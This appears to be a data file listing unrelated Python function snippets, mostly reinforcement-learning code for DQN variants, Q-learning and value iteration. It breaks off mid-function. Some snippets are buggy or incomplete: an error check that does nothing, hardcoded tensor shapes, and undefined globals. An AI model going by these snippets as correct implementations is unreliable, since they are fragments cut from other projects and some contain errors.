[ "def Q_net(self, state):\n\t\tif not self._prediction_made: \n\t\t\tQ = tf.matmul(tf.nn.relu( tf.matmul(state, self.weights_hidden) + self.bias_hidden ), self.weights_out) + self.bias_out \n\t\t\tself._Qval = Q\t\n\t\t\tself._prediction_made = True\n\t\treturn self._Qval", "def final_result(self, board):\n if board.myMarbles>board.opMarbles:\n reward = self.win_value + self.myMarbles - self.opMarbles\n elif board.myMarbles == board.opMarbles:\n reward = self.draw_value\n else:\n reward = self.loss_value + self.myMarbles-self.opMarbles\n self.game_counter += 1\n self.add_game_to_replay_buffer(reward)\n\n # If we are in training mode we run the optimizer.\n if self.training and (self.game_counter > self.pre_training_games):\n\n batch_third = self.batch_size // 3\n train_batch = self.replay_buffer_win.sample(batch_third)\n train_batch.extend(self.replay_buffer_loss.sample(batch_third))\n train_batch.extend(self.replay_buffer_draw.sample(batch_third))\n train_batch = np.array(train_batch)\n\n #\n # Let's compute the target q values for all non terminal move\n # We extract the resulting state, run it through the target net work and\n # get the maximum q value (of all valid moves)\n next_states = [s[2] for s in train_batch if s[2] is not None]\n # print('current board\\n', board)\n # print('next_states', next_states)\n target_qs = []\n\n if len(next_states) > 0:\n firstInput = [self.board_state_to_nn_input(s) for s in next_states]\n # print(firstInput)\n firstInput = np.asarray(firstInput).reshape(20, 1,2,6)[0]\n # print(firstInput.shape)\n # for i in next_states:\n # print(i[0])\n # print(i[1])\n # input()\n probs, qvals = self.get_valid_probs(firstInput,\n self.target_net, [Board(s[0], s[1]) for s in next_states], True)\n # print(probs)\n # print(qvals)\n # input()\n probs=probs[0]\n qvals=qvals[0]\n # print(qvals)\n i = 0\n for t in train_batch:\n if t[2] is not None:\n # print(t[2])\n # print(probs)\n # input()\n max_move = np.argmax(probs)\n max_qval = qvals[max_move]\n target_qs.append(max_qval * self.reward_discount)\n i += 1\n else:\n target_qs.append(t[3])\n\n if i != len(next_states):\n (\"Something wrong here!!!\")\n else:\n target_qs.extend(train_batch[:, 6])\n\n # We convert the input states we have recorded to feature vectors to feed into the training.\n nn_input = [self.board_state_to_nn_input(x[0]) for x in train_batch]\n actions = train_batch[:, 1]\n\n # We run the training step with the recorded inputs and new Q value targets.\n # print(self.q_net.merge.shape)\n # print(self.q_net.train_step.shape)\n # print(np.asarray([self.q_net.merge, self.q_net.train_step]).shape)\n # print(self.q_net.input_positions.shape)\n # print(nn_input.shape)\n # print(self.q_net.target_q.shape)\n # print(target_qs.shape)\n # print(self.q_net.actions.shape)\n # print(actions.shape)\n # print(type(nn_input))\n summary, _ = TFSN.get_session().run([self.q_net.merge, self.q_net.train_step],\n feed_dict={self.q_net.input_positions: np.asarray(nn_input).reshape(20,1,2,6),\n self.q_net.target_q: target_qs,\n self.q_net.actions: actions})\n self.random_move_prob *= self.random_move_decrease\n\n if self.writer is not None:\n self.writer.add_summary(summary, self.game_counter)\n summary = tf.Summary(value=[tf.Summary.Value(tag='Random_Move_Probability',\n simple_value=self.random_move_prob)])\n self.writer.add_summary(summary, self.game_counter)\n\n TFSN.get_session().run(self.graph_copy_op)", "def train(network_def, target_params, optimizer, states, actions, next_states, rewards,\n terminals, loss_weights, cumulative_gamma, target_opt, mse_inf,tau,alpha,clip_value_min, rng):\n online_params = optimizer.target\n def loss_fn(params, rng_input, target, loss_multipliers):\n def q_online(state):\n return network_def.apply(params, state, rng=rng_input)\n\n q_values = jax.vmap(q_online)(states).q_values\n q_values = jnp.squeeze(q_values)\n replay_chosen_q = jax.vmap(lambda x, y: x[y])(q_values, actions)\n \n if mse_inf:\n loss = jax.vmap(mse_loss)(target, replay_chosen_q)\n else:\n loss = jax.vmap(dqn_agent.huber_loss)(target, replay_chosen_q)\n\n mean_loss = jnp.mean(loss_multipliers * loss)\n return mean_loss, loss\n\n rng, rng2, rng3, rng4 = jax.random.split(rng, 4)\n\n def q_target(state):\n return network_def.apply(target_params, state, rng=rng2)\n\n def q_target_online(state):\n return network_def.apply(online_params, state, rng=rng4)\n\n if target_opt == 0:\n target = dqn_agent.target_q(q_target, next_states, rewards, terminals, cumulative_gamma) \n elif target_opt == 1:\n #Double DQN\n target = target_DDQN(q_target_online, q_target, next_states, rewards, terminals, cumulative_gamma)\n\n elif target_opt == 2:\n #Munchausen\n target = target_m_dqn(q_target_online, q_target, states,next_states,actions,rewards,terminals,\n cumulative_gamma,tau,alpha,clip_value_min)\n else:\n print('error')\n\n grad_fn = jax.value_and_grad(loss_fn, has_aux=True)\n (mean_loss, loss), grad = grad_fn(online_params, rng3, target, loss_weights)\n optimizer = optimizer.apply_gradient(grad)\n return optimizer, loss, mean_loss", "def evaluate(self):\n # initialize delta_weights\n Loss = 0\n for i, x_test in enumerate(self.X_test):\n Loss += (self.sigmoid(np.dot(self.weights,x_test))-self.y_test[i])**2\n return Loss", "def evaluate(self, state, epsilon=1e-6, reparam=False):\n\n action_probs = self.forward(state)\n action_pd = GumbelSoftmax(probs=action_probs, temperature=0.9)\n actions = action_pd.rsample() if reparam else action_pd.sample()\n log_probs = action_pd.log_prob(actions)\n return actions, log_probs, None, None, None", "def predict(self, state):\n if self.phase is None or self.device is None:\n raise AttributeError('Phase, device attributes have to be set!')\n if self.phase == 'train' and self.epsilon is None:\n raise AttributeError('Epsilon attribute has to be set in training phase')\n\n if self.reach_destination(state):\n return ActionXY(0, 0) if self.kinematics == 'holonomic' else ActionRot(0, 0)\n if self.action_space is None:\n self.build_action_space(state.robot_state.v_pref)\n\n probability = np.random.random()\n if self.phase == 'train' and probability < self.epsilon:\n max_action = self.action_space[np.random.choice(len(self.action_space))]\n else:\n max_action = None\n max_value = float('-inf')\n max_traj = None\n\n if self.do_action_clip:\n state_tensor = state.to_tensor(add_batch_size=True, device=self.device)\n action_space_clipped = self.action_clip(state_tensor, self.action_space, self.planning_width)\n else:\n action_space_clipped = self.action_space\n\n for action in action_space_clipped:\n state_tensor = state.to_tensor(add_batch_size=True, device=self.device)\n next_state = self.state_predictor(state_tensor, action)\n max_next_return, max_next_traj = self.V_planning(next_state, self.planning_depth, self.planning_width)\n reward_est = self.estimate_reward(state, action)\n value = reward_est + self.get_normalized_gamma() * max_next_return\n if value > max_value:\n max_value = value\n max_action = action\n max_traj = [(state_tensor, action, reward_est)] + max_next_traj\n if max_action is None:\n raise ValueError('Value network is not well trained.')\n\n if self.phase == 'train':\n self.last_state = self.transform(state)\n else:\n self.traj = max_traj\n\n return max_action", "def valueIteration(P,R,gamma,theta,initial_v,max_iter=1e8):\n print('Running value iteration ...')\n\n def one_step_lookahead(s, V):\n \"\"\"\n :param state: current state\n :param v: current value estimator\n :return: A, list of optimal action values under current value estimator\n \"\"\"\n num_a = num_actions\n num_S = num_states\n\n A = np.zeros(num_a)\n\n for a in range(num_a):\n for s_prime in range(num_S):\n A[a] += P[s, a, s_prime] * (R[s, a, s_prime] + gamma * V[s_prime])\n return A\n \n # initialization\n v = initial_v \n num_states, num_actions = P.shape[:2]\n k = 0 \n best_actions = [0] * num_states\n delta = 1000\n\n while delta > theta and k <= max_iter:\n delta = 0\n k += 1\n for s in range(num_states):\n action_values = one_step_lookahead(s, v)\n best_action_value = np.max(action_values)\n delta = max(delta, np.abs(best_action_value - v[s]))\n v[s] = best_action_value\n print(delta)\n\n for s in range(num_states):\n A = one_step_lookahead(s, v)\n best_actions[s] = np.argmax(A)\n\n\n print('number of iterations:', k)\n return best_actions, v", "def learn(self, batch_size, gamma, state_number, priority_scale=1.0):\n if self.use_per:\n (states, actions, rewards, new_states,\n terminal_flags), importance, indices = self.replay_buffer.get_minibatch(batch_size=self.batch_size,\n priority_scale=priority_scale)\n importance = importance ** (1 - self.calc_epsilon(state_number))\n else:\n states, actions, rewards, new_states, terminal_flags = self.replay_buffer.get_minibatch(\n batch_size=self.batch_size, priority_scale=priority_scale)\n\n # Target DQN estimates q-vals for new states\n result_ids = []\n for state in new_states:\n result_ids.append(self.target_dqn.predict.remote(np.expand_dims(state, axis=0)))\n\n results = ray.get(result_ids)\n target_future_v = np.amax(np.array(results).squeeze(), axis=1)\n\n # Calculate targets (bellman equation)\n target_q = rewards + (gamma * target_future_v * (1 - terminal_flags))\n\n # Use targets to calculate loss (and use loss to calculate gradients)\n with tf.GradientTape() as tape:\n trainable_variables = ray.get(self.dqn.trainable_variables.remote())\n tape.watch(trainable_variables)\n\n predict_ids = []\n for state in states:\n predict_ids.append(self.dqn.call.remote(np.expand_dims(state, axis=0)))\n\n q_values = tf.squeeze(tf.stack(ray.get(predict_ids)))\n\n one_hot_actions = tf.keras.utils.to_categorical(actions, self.n_actions,\n dtype=np.float32) # using tf.one_hot causes strange errors\n Q = tf.reduce_sum(tf.multiply(q_values, one_hot_actions), axis=1)\n\n error = Q - target_q\n loss = tf.keras.losses.Huber(delta=1.35)(target_q, Q)\n\n if self.use_per:\n # Multiply the loss by importance, so that the gradient is also scaled.\n # The importance scale reduces bias against situataions that are sampled\n # more frequently.\n loss = tf.reduce_mean(loss * importance)\n\n model_gradients = tape.gradient(loss, trainable_variables)\n self.dqn.apply_gradients.remote(model_gradients, trainable_variables)\n\n if self.use_per:\n self.replay_buffer.set_priorities(indices, error)\n\n return float(loss.numpy()), error", "def __call__(self, y_true: np.ndarray, y_pred: np.ndarray) -> float:", "def qlearning(env, iterations=1000, gamma=0.9, alpha=0.1):\n nS = env.nS # number of states\n nA = env.nA # number of actions\n Q_value = np.zeros((nS, nA))\n policy = np.ones((env.nS,env.nA))/env.nA\n epsilon = 1\n s_t1 = env.reset() # reset the environment and place the agent in the start square\n ############################\n # YOUR IMPLEMENTATION HERE #\n # HINT: Don't forget to decay epsilon according to GLIE\n\n curr_state = s_t1\n \n start = time.time() # to time how long convergence takes\n print(\"---Q Learning---\\nTraining Started.\")\n \n for k in range (1, iterations):\n # if (k%10000) == 0:\n # print(\"Now playing iteration: \", k)\n epsilon = 1/k\n curr_action, reward, new_state, done = take_one_step(env, policy, curr_state)\n new_action = sample_action(policy, new_state)\n Q_value[curr_state, curr_action] = Q_value[curr_state, curr_action] + alpha * (reward + gamma * (Q_value[new_state, np.argmax(Q_value[new_state])]) - Q_value[curr_state, curr_action])\n \n # epsilon-greedy policy update\n Q_list = np.argwhere(Q_value[curr_state] == np.amax(Q_value[curr_state])).flatten() # get a list of all indices where Q is maximum, (argmax(Q))\n max_Q = np.random.choice(Q_list.flatten()) # randomly pick from those indices. Picking each index is equally likely.\n for a in range (nA):\n if a == max_Q:\n policy[curr_state][a] = epsilon/nA + (1 - epsilon) # for the chosen maximal index of Q, set the policy to epsilon/m + 1 - epsilon\n else:\n policy[curr_state][a] = epsilon/nA \n \n # print(\"Q_value = {0}\".format(Q_value))\n # print(\"policy = {0}\".format(policy))\n \n if done:\n curr_state = env.reset() # reset the environment and place the agent in the start square\n curr_action = sample_action(policy, curr_state)\n else:\n curr_state = new_state\n curr_action = new_action\n \n stop = time.time()\n print(\"Training Completed.\")\n print(\"It took: {0} iterations and {1} minutes\".format(k,(stop-start)/60))\n \n ############################\n det_policy = np.argmax(Q_value, axis=1)\n return Q_value, det_policy", "def evaluate(self):\n RV = -self.predict()\n RV += self.Ystar()\n return RV", "def target_m_dqn(model, target_network, states, next_states, actions,rewards, terminals, \n cumulative_gamma,tau,alpha,clip_value_min):\n \n #----------------------------------------\n q_state_values = jax.vmap(target_network, in_axes=(0))(states).q_values\n q_state_values = jnp.squeeze(q_state_values)\n \n next_q_values = jax.vmap(target_network, in_axes=(0))(next_states).q_values\n next_q_values = jnp.squeeze(next_q_values)\n #----------------------------------------\n\n tau_log_pi_next = stable_scaled_log_softmax(next_q_values, tau, axis=1)\n pi_target = stable_softmax(next_q_values,tau, axis=1)\n replay_log_policy = stable_scaled_log_softmax(q_state_values, tau, axis=1)\n\n #----------------------------------------\n \n replay_next_qt_softmax = jnp.sum((next_q_values-tau_log_pi_next)*pi_target,axis=1)\n\n replay_action_one_hot = nn.one_hot(actions, q_state_values.shape[-1])\n tau_log_pi_a = jnp.sum(replay_log_policy * replay_action_one_hot, axis=1)\n\n #a_max=1\n tau_log_pi_a = jnp.clip(tau_log_pi_a, a_min=clip_value_min,a_max=1)\n\n munchausen_term = alpha * tau_log_pi_a\n modified_bellman = (rewards + munchausen_term +cumulative_gamma * replay_next_qt_softmax *\n (1. - jnp.float32(terminals)))\n \n return jax.lax.stop_gradient(modified_bellman)", "def jval(self):\n return self.q * self.model.nobs_moms", "def train_replay(self):\n\n if len(self.memory) < self.train_start:\n return\n\n if self.epsilon > self.epsilon_end:\n self.epsilon -= self.epsilon_decay_step\n\n mini_batch = random.sample(self.memory, self.batch_size)\n\n history = np.zeros((self.batch_size, self.state_size[0],\n self.state_size[1], self.state_size[2]))\n next_history = np.zeros((self.batch_size, self.state_size[0],\n self.state_size[1], self.state_size[2]))\n\n # Initialize the Value targets to optimize\n v_target = np.zeros((self.batch_size,))\n\n action, reward, dead = [], [], []\n\n for i in range(self.batch_size):\n history[i] = np.float32(mini_batch[i][0] / 255.)\n next_history[i] = np.float32(mini_batch[i][3] / 255.)\n action.append(mini_batch[i][1])\n reward.append(mini_batch[i][2])\n dead.append(mini_batch[i][4])\n\n # current state-action values Q(st, at)\n q_outputs = self.q_duelling_part.predict(history)\n\n # TD-values for updating the networks coming from the target model\n if self.target_model is True:\n v_target_value = self.target_v_duelling_part.predict(next_history)\n elif self.target_model is False:\n v_target_value = self.v_duelling_part.predict(next_history)\n\n q_targets = []\n\n for i in range(self.batch_size):\n if dead[i]:\n v_target[i] = reward[i]\n q_outputs[i][action[i]] = reward[i]\n\n else:\n v_target[i] = reward[i] + \\\n self.discount_factor * v_target_value[i]\n q_outputs[i][action[i]] = reward[i] + \\\n self.discount_factor * v_target_value[i]\n\n q_targets.append(q_outputs[i][action[i]])\n\n self.optimizer([history, action, q_targets]) # optimize the state-action-value head\n self.v_duelling_part.fit(history, v_target, epochs=1, verbose=0) # optimize the state-value head", "def _compute_q_argmax(self):\n self.cur_head = self._sess.run(self.ucb_net._P_argmax,\n {self.state_ph: self.state,\n self.ucb_A_ph: self.ucb_A,\n self.ucb_b_ph: self.ucb_b})[0]\n x = self._sess.run(self._net_outputs.q_heads,\n {self.state_ph: self.state})\n return np.argmax(x[:,:,self.cur_head], axis=1)[0]", "def learn(self):\r\n \r\n # take a mini-batch from replay experience\r\n cur_batch_size = min(len(self.replay_exp), self.batch_size)\r\n mini_batch = random.sample(self.replay_exp, cur_batch_size)\r\n \r\n # batch data\r\n sample_states = np.ndarray(shape = (cur_batch_size, self.state_size)) # replace 128 with cur_batch_size\r\n sample_actions = np.ndarray(shape = (cur_batch_size, 1))\r\n sample_rewards = np.ndarray(shape = (cur_batch_size, 1))\r\n sample_next_states = np.ndarray(shape = (cur_batch_size, self.state_size))\r\n sample_dones = np.ndarray(shape = (cur_batch_size, 1))\r\n\r\n temp=0\r\n for exp in mini_batch:\r\n sample_states[temp] = exp[0]\r\n sample_actions[temp] = exp[1]\r\n sample_rewards[temp] = exp[2]\r\n sample_next_states[temp] = exp[3]\r\n sample_dones[temp] = exp[4]\r\n temp += 1\r\n \r\n \r\n sample_qhat_next = self.brain_target.predict(sample_next_states)\r\n \r\n # set all Q values terminal states to 0\r\n sample_qhat_next = sample_qhat_next * (np.ones(shape = sample_dones.shape) - sample_dones)\r\n # choose max action for each state\r\n sample_qhat_next = np.max(sample_qhat_next, axis=1)\r\n \r\n sample_qhat = self.brain_policy.predict(sample_states)\r\n \r\n for i in range(cur_batch_size):\r\n a = sample_actions[i,0]\r\n sample_qhat[i,int(a)] = sample_rewards[i] + self.gamma * sample_qhat_next[i]\r\n \r\n q_target = sample_qhat\r\n \r\n self.brain_policy.fit(sample_states, q_target, epochs = 1, verbose = 0)\r\n \r\n \r\n \r\n \"\"\"\r\n \r\n for state, action, reward, next_state, done in mini_batch:\r\n target_Q_s_a = 0 # new target for Q(s,a)\r\n state = np.reshape(state, [1, state_size])\r\n next_state = np.reshape(next_state, [1, state_size])\r\n \r\n # if it is not the terminal state\r\n if not done:\r\n qhat_next = self.brain_target.predict(next_state) # estimate Q(s',a')\r\n target_Q_s_a = reward + self.gamma * np.amax(qhat_next[0]) # because the output is m * n, so we need to consider the dimension [0]\r\n else:\r\n target_Q_s_a = reward\r\n \r\n target_output = self.brain_policy.predict(state) # we will replace target of Q(s,a) for specific a later\r\n target_output[0][action] = target_Q_s_a # new target for state s and action a\r\n \r\n self.brain_policy.fit(state, target_output, epochs = 1, verbose = 0)\r\n \r\n \"\"\"", "def train(network_def, target_params, optimizer, states, actions, next_states, rewards,\n terminals, loss_weights, target_opt, num_tau_samples, num_tau_prime_samples,\n num_quantile_samples, cumulative_gamma, double_dqn, kappa, tau,alpha,clip_value_min, num_actions,rng):\n online_params = optimizer.target\n def loss_fn(params, rng_input, target_quantile_vals, loss_multipliers):\n def online(state):\n return network_def.apply(params, state, num_quantiles=num_tau_samples, rng=rng_input)\n\n model_output = jax.vmap(online)(states)\n quantile_values = model_output.quantile_values\n quantiles = model_output.quantiles\n chosen_action_quantile_values = jax.vmap(lambda x, y: x[:, y][:, None])(\n quantile_values, actions)\n # Shape of bellman_erors and huber_loss:\n # batch_size x num_tau_prime_samples x num_tau_samples x 1.\n bellman_errors = (target_quantile_vals[:, :, None, :] -\n chosen_action_quantile_values[:, None, :, :])\n # The huber loss (see Section 2.3 of the paper) is defined via two cases:\n # case_one: |bellman_errors| <= kappa\n # case_two: |bellman_errors| > kappa\n huber_loss_case_one = (\n (jnp.abs(bellman_errors) <= kappa).astype(jnp.float32) *\n 0.5 * bellman_errors ** 2)\n huber_loss_case_two = (\n (jnp.abs(bellman_errors) > kappa).astype(jnp.float32) *\n kappa * (jnp.abs(bellman_errors) - 0.5 * kappa))\n huber_loss = huber_loss_case_one + huber_loss_case_two\n # Tile by num_tau_prime_samples along a new dimension. Shape is now\n # batch_size x num_tau_prime_samples x num_tau_samples x 1.\n # These quantiles will be used for computation of the quantile huber loss\n # below (see section 2.3 of the paper).\n quantiles = jnp.tile(quantiles[:, None, :, :],\n [1, num_tau_prime_samples, 1, 1]).astype(jnp.float32)\n # Shape: batch_size x num_tau_prime_samples x num_tau_samples x 1.\n quantile_huber_loss = (jnp.abs(quantiles - jax.lax.stop_gradient(\n (bellman_errors < 0).astype(jnp.float32))) * huber_loss) / kappa\n # Sum over current quantile value (num_tau_samples) dimension,\n # average over target quantile value (num_tau_prime_samples) dimension.\n # Shape: batch_size x num_tau_prime_samples x 1.\n loss = jnp.sum(quantile_huber_loss, axis=2)\n loss = jnp.squeeze(jnp.mean(loss, axis=1), axis=-1)\n\n mean_loss = jnp.mean(loss_multipliers * loss)\n\n return mean_loss, loss\n\n grad_fn = jax.value_and_grad(loss_fn, has_aux=True)\n\n if target_opt == 0:\n rng, target_quantile_vals = target_quantile_values_fun(\n network_def,\n online_params,\n target_params,\n next_states,\n rewards,\n terminals,\n num_tau_prime_samples,\n num_quantile_samples,\n cumulative_gamma,\n double_dqn,\n rng)\n\n elif target_opt == 1:\n rng, target_quantile_vals = munchau_target_quantile_values_fun(\n network_def,\n online_params,\n target_params,\n states,\n actions,\n next_states,\n rewards,\n terminals,\n num_tau_prime_samples,\n num_quantile_samples,\n cumulative_gamma,\n double_dqn,\n rng,\n tau,\n alpha,\n clip_value_min,\n num_actions\n )\n\n else:\n print('error')\n\n rng, rng_input = jax.random.split(rng)\n (mean_loss, loss), grad = grad_fn(online_params, rng_input, target_quantile_vals, loss_weights)\n optimizer = optimizer.apply_gradient(grad)\n return rng, optimizer, loss, mean_loss", "def learn(self, state, action, reward, next_state):\r\n\r\n \"\"\"Please Fill Your Code Here.\r\n \"\"\"\r\n self.Q[state][action] = self.Q[state][action] + self.alpha * (reward + self.gamma * max(self.Q[next_state]) - self.Q[state][action])\r\n\r\n return 0", "def update_predict_network(self):\n states, actions, rewards, new_states, is_terminals = self.memory.sample(self.batch_size)\n\n preprocessed_states, preprocessed_new_states = self.preprocessor.process_batch(states, new_states)\n\n actions = self.preprocessor.process_action(actions)\n # update network\n q_values = self.cal_target_q_values(preprocessed_new_states)\n max_q_values = np.max(q_values, axis=1)\n max_q_values[is_terminals] = 0.0\n targets = rewards + self.gamma * max_q_values\n targets = np.expand_dims(targets, axis=1)\n\n self.q_network.train_on_batch([preprocessed_states, actions], targets)\n if self.num_steps % self.target_update_freq ==0:\n print(\"Update target network at %d steps\" % self.num_steps)\n self.update_target_network()", "def compute_td_loss(self, states, actions, rewards, next_states, is_done, gamma=0.99):\r\n actions = tf.convert_to_tensor(actions) # shape: [batch_size * seq_len]\r\n rewards = tf.convert_to_tensor(rewards) # shape: [batch_size * seq_len]\r\n is_done = tf.convert_to_tensor(is_done) # shape: [batch_size * seq_len]\r\n\r\n actions = tf.reshape(actions, [-1])\r\n rewards = tf.reshape(rewards, [-1])\r\n is_done = tf.reshape(is_done, [-1])\r\n states = tf.reshape(states, [batch_size * max_seq, 1, 4])\r\n next_states = tf.reshape(next_states, [batch_size * max_seq, 1, 4])\r\n # if self.USE_CUDA:\r\n # actions = actions.cuda()\r\n # rewards = rewards.cuda()\r\n # is_done = is_done.cuda()\r\n\r\n # get q-values for all actions in current states\r\n predicted_qvalues = self.DRQN.model.predict(states, steps=1)\r\n # predicted_qvalues = predicted_qvalues.reshape(-1, self.action_space.n)\r\n # predicted_qvalues = predicted_qvalues.squeeze(0)\r\n\r\n # select q-values for chosen actions\r\n # a = np.concatenate(actions)\r\n\r\n # predicted_qvalues_for_actions = predicted_qvalues[\r\n # range(states.shape[0]), actions\r\n # ]\r\n\r\n # compute q-values for all actions in next states\r\n predicted_next_qvalues = self.DRQN_target.model.predict(next_states, steps=1) # YOUR CODE\r\n # predicted_next_qvalues = predicted_next_qvalues.squeeze(0)\r\n predicted_next_qvalues = predicted_next_qvalues.reshape(-1, self.action_space.n)\r\n\r\n # compute V*(next_states) using predicted next q-values\r\n next_state_values = predicted_next_qvalues.max(-1)\r\n next_state_values_arg = predicted_next_qvalues.argmax(-1)\r\n # compute \"target q-values\" for loss - it's what's inside square parentheses in the above formula.\r\n target_qvalues_for_actions = rewards + gamma * next_state_values\r\n\r\n # at the last state we shall use simplified formula: Q(s,a) = r(s,a) since s' doesn't exist\r\n target_qvalues_for_actions = tf.where(\r\n is_done, rewards, target_qvalues_for_actions)\r\n # if is_done:\r\n # target_qvalues_for_actions = rewards\r\n # else:\r\n # target_qvalues_for_actions = target_qvalues_for_actions\r\n for i in range(len(target_qvalues_for_actions)):\r\n j = next_state_values_arg[i]\r\n predicted_qvalues[i][0][j] = target_qvalues_for_actions[i]\r\n # mean squared error loss to minimize\r\n loss = self.DRQN.train(states, predicted_qvalues)\r\n\r\n return loss", "def update(Q, target_Q, opt, samples, gamma=0.99, target_type='double_dqn'):\n xp = Q.xp\n obs = xp.asarray([sample[0] for sample in samples], dtype=np.float32)\n action = xp.asarray([sample[1] for sample in samples], dtype=np.int32)\n reward = xp.asarray([sample[2] for sample in samples], dtype=np.float32)\n done = xp.asarray([sample[3] for sample in samples], dtype=np.float32)\n obs_next = xp.asarray([sample[4] for sample in samples], dtype=np.float32)\n # Predicted values: Q(s,a)\n y = F.select_item(Q(obs), action)\n # Target values: r + gamma * max_b Q(s',b)\n with chainer.no_backprop_mode():\n if target_type == 'dqn':\n next_q = F.max(target_Q(obs_next), axis=1)\n elif target_type == 'double_dqn':\n next_q = F.select_item(target_Q(obs_next),\n F.argmax(Q(obs_next), axis=1))\n else:\n raise ValueError('Unsupported target_type: {}'.format(target_type))\n target = reward + gamma * (1 - done) * next_q\n loss = mean_clipped_loss(y, target)\n Q.cleargrads()\n loss.backward()\n opt.update()", "def _build_target_q_op(self):\n targets = []\n for gamma, target_q in zip(self.gammas,\n self._replay_next_target_net_outputs.q_values):\n # Get the maximum Q-value across the actions dimension.\n replay_next_qt_max = tf.reduce_max(target_q, 1)\n\n # Calculate the Bellman target value.\n # Q_t = R_t + \\gamma^N * Q'_t+1\n # where,\n # Q'_t+1 = \\argmax_a Q(S_t+1, a)\n # (or) 0 if S_t is a terminal state,\n # and\n # N is the update horizon (by default, N=1).\n cumulative_gamma = math.pow(gamma, self.update_horizon)\n n_step_reward = self._build_discounted_n_step_rewards(gamma)\n targets.append(n_step_reward + cumulative_gamma * replay_next_qt_max *\n (1. - tf.cast(self._replay.terminals, tf.float32)))\n return targets", "def get_action(self, history):\n history = np.float32(history / 255.0)\n if np.random.rand() <= self.epsilon:\n return random.randrange(3)\n\n else:\n q_values = self.q_duelling_part.predict(history)\n\n return np.argmax(q_values[0])", "def target_DDQN(model, target_network, next_states, rewards, terminals, cumulative_gamma):\n next_q_values = jax.vmap(model, in_axes=(0))(next_states).q_values\n next_q_values = jnp.squeeze(next_q_values)\n replay_next_qt_max = jnp.argmax(next_q_values, axis=1)\n next_q_state_values = jax.vmap(target_network, in_axes=(0))(next_states).q_values\n\n q_values = jnp.squeeze(next_q_state_values)\n replay_chosen_q = jax.vmap(lambda t, u: t[u])(q_values, replay_next_qt_max)\n \n return jax.lax.stop_gradient(rewards + cumulative_gamma * replay_chosen_q *\n (1. - terminals))", "def result(self):\r\n # TODO: how about xcurrent?\r\n return self.best.get() + (\r\n self.countevals, self.countiter, self.gp.pheno(self.mean), self.gp.scales * self.sigma * self.sigma_vec * self.dC**0.5)", "def _take_action(self, state):\n feed = {self.inputs_: state.reshape((1, *state.shape))}\n Qs = sess.run(self.output, feed_dict=feed)\n return np.argmax(Qs)", "def target_quantile_values(network, online_params, target_params, states,\n next_states, rewards, terminals,\n num_tau_prime_samples, num_quantile_samples,\n cumulative_gamma, double_dqn, rng):\n rng, rng1, rng2, rng3 = jax.random.split(rng, num=4)\n curr_state_representation = network.apply(\n target_params, states, num_quantiles=num_quantile_samples,\n rng=rng3).representation\n curr_state_representation = jnp.squeeze(curr_state_representation)\n rewards = jnp.tile(rewards, [num_tau_prime_samples])\n is_terminal_multiplier = 1. - terminals.astype(jnp.float32)\n # Incorporate terminal state to discount factor.\n gamma_with_terminal = cumulative_gamma * is_terminal_multiplier\n gamma_with_terminal = jnp.tile(gamma_with_terminal, [num_tau_prime_samples])\n # Compute Q-values which are used for action selection for the next states\n # in the replay buffer. Compute the argmax over the Q-values.\n if double_dqn:\n outputs_action = network.apply(online_params,\n next_states,\n num_quantiles=num_quantile_samples,\n rng=rng1)\n else:\n outputs_action = network.apply(target_params,\n next_states,\n num_quantiles=num_quantile_samples,\n rng=rng1)\n target_quantile_values_action = outputs_action.quantile_values\n target_q_values = jnp.squeeze(\n jnp.mean(target_quantile_values_action, axis=0))\n # Shape: batch_size.\n next_qt_argmax = jnp.argmax(target_q_values)\n # Get the indices of the maximium Q-value across the action dimension.\n # Shape of next_qt_argmax: (num_tau_prime_samples x batch_size).\n next_state_target_outputs = network.apply(\n target_params,\n next_states,\n num_quantiles=num_tau_prime_samples,\n rng=rng2)\n next_qt_argmax = jnp.tile(next_qt_argmax, [num_tau_prime_samples])\n target_quantile_vals = (\n jax.vmap(lambda x, y: x[y])(next_state_target_outputs.quantile_values,\n next_qt_argmax))\n target_quantile_vals = rewards + gamma_with_terminal * target_quantile_vals\n # We return with an extra dimension, which is expected by train.\n next_state_representation = next_state_target_outputs.representation\n next_state_representation = jnp.squeeze(next_state_representation)\n return (\n rng,\n jax.lax.stop_gradient(target_quantile_vals[:, None]),\n jax.lax.stop_gradient(curr_state_representation),\n jax.lax.stop_gradient(next_state_representation))", "def loss_function(self, q_vals, next_q_vals, rewards, actions, double_q_vals=None):\n with self.graph.as_default():\n with tf.name_scope('loss'):\n \"\"\"\n Calculate the target value(s)\n \"\"\"\n if double_q_vals is not None:\n # Select maximizing action using online network\n max_index = tf.argmax(double_q_vals, axis=1, output_type=tf.int32)\n indices = tf.stack([tf.range(0,self.batch_size), max_index], axis=-1)\n # Evaluate Q using target network\n next_q_acted = tf.gather_nd(next_q_vals, indices)\n else:\n # Select the maximum value of the next_q_vals: max_a Q(s_t+1,a)\n next_q_acted = tf.reduce_max(next_q_vals, axis=1)\n # y = r + gamma * max Q(s_t+1)\n target = tf.add_n([rewards, tf.scalar_mul(self.gamma, next_q_acted)], name='target_values')\n \"\"\"\n Retrieve the Q-value(s) of the given actions\n \"\"\"\n # Q(s_t,a_t)\n indices = tf.stack([tf.range(0,self.batch_size), actions], axis=-1)\n q_acted = tf.gather_nd(q_vals, indices)\n \"\"\"\n Calculate the loss: squared TD-error\n \"\"\"\n # This is the TD-error: y - Q(s_t,a_t)\n diff = tf.subtract(target, q_acted, name='TD_errors')\n # reduce-mean averages the negative and positive td-errors\n td_loss = tf.square(diff, name='squared_TD_errors')\n loss = tf.reduce_mean(td_loss)\n # Squared_TD_errors is the mean-squared-loss we want to minimize in training\n\n return loss, diff", "def obtain_training_parameters(para, x, y, alg = 'LR'):\n \n \n global omega\n \n # Iterate to find the optimal parameters\n if alg == 'LR': # logistic regression\n omega = np.zeros((3, 1))\n alpha = para.step_size # step size\n for i in range(para.iteration):\n grad = np.zeros((3, 1))\n for i in range(len(x[:, 0])):\n grad += np.reshape(x[i, :], (3, 1)) * (-y[i] + 1 / (1 + np.exp(-np.dot(x[i, :], omega))))\n omega -= alpha * grad \n \n elif alg == 'GNB': # Gaussian Naive Bayes\n # get counts for each class\n itszero = 0\n itsone = 0\n for i in range(len(y)):\n if y[i] == 1:\n itsone += 1\n else:\n itszero += 1\n \n # probability of see y\n theta0 = itszero / len(y)\n theta1 = 1 - theta0\n \n # mean of omega\n mew00 = 0\n mew01 = 0\n mew02 = 0\n mew10 = 0\n mew11 = 0\n mew12 = 0\n for i in range(len(y)):\n if y[i] == 0:\n mew00 += x[i, 0] / itszero\n mew01 += x[i, 1] / itszero\n mew02 += x[i, 2] / itszero\n else:\n mew10 += x[i, 0] / itsone\n mew11 += x[i, 1] / 